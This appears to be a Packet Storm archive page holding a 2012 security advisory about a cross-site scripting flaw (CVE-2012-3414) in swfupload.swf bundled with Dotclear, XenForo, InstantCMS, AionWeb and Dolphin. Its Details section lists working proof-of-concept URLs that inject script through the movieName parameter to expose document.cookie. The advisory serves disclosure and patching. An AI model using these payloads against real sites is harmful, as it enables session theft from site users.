exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SWF Upload Cross Site Scripting

SWF Upload Cross Site Scripting
Posted Nov 13, 2012
Authored by MustLive

Dotclear, InstantCMS, AionWeb, and Dolphin all include a version of swfupload.swf that suffers from a cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2012-3414
SHA-256 | a2a158397ae79c78e46a0c4935d002352662c55b69f1181ce13b4acd1f39d885

SWF Upload Cross Site Scripting

Change Mirror Download
Hello list!

I will draw your attention to XSS vulnerability in other web applications
with swfupload. Earlier I've wrote about swfupload in WordPress
(CVE-2012-3414) and that this hole is available in many web applications.

In previous letter I've wrote the information about different versions of
this swf-file (with different names) and all versions of WordPress, which
contain any of these swf-files. And here is information about Dotclear,
XenForo, InstantCMS, AionWeb, Dolphin - among multiple web applications
which are bundled with swfupload.swf.

-------------------------
Affected products:
-------------------------

Vulnerable are potentially all versions of Dotclear, InstantCMS, AionWeb,
Dolphin. There is no information that they have fixed this vulnerability in
their software (at that this vulnerability was fixed in WordPress 3.3.2 at
20.04.2012).

Vulnerable are versions XenForo 1.0.0 - 1.1.2. In XenForo 1.1.3 this
vulnerability was fixed and patch was released for previous versions
(already at 19.06.2012).

The developers of WordPress released new version of flash file (the same did
the developers of XenForo), which could be used by all web developers, which
were using swfupload.

----------
Details:
----------

XSS (WASC-08):

Dotclear:

http://site/inc/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

XenForo:

http://site/js/swfupload/Flash/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

InstantCMS:

http://site/includes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

AionWeb:

http://site/engine/classes/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Dolphin:

http://site/plugins/swfupload/swf/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Swfupload is used in WordPress, plugins for WP and in other web
applications. There are many web applications with it, not as many as those
which are using JW Player (http://securityvulns.com/docs28176.html) and JW
Player Pro (http://securityvulns.com/docs28483.html) (vulnerabilities in
them I've disclosed earlier), but still a lot of.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    23 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close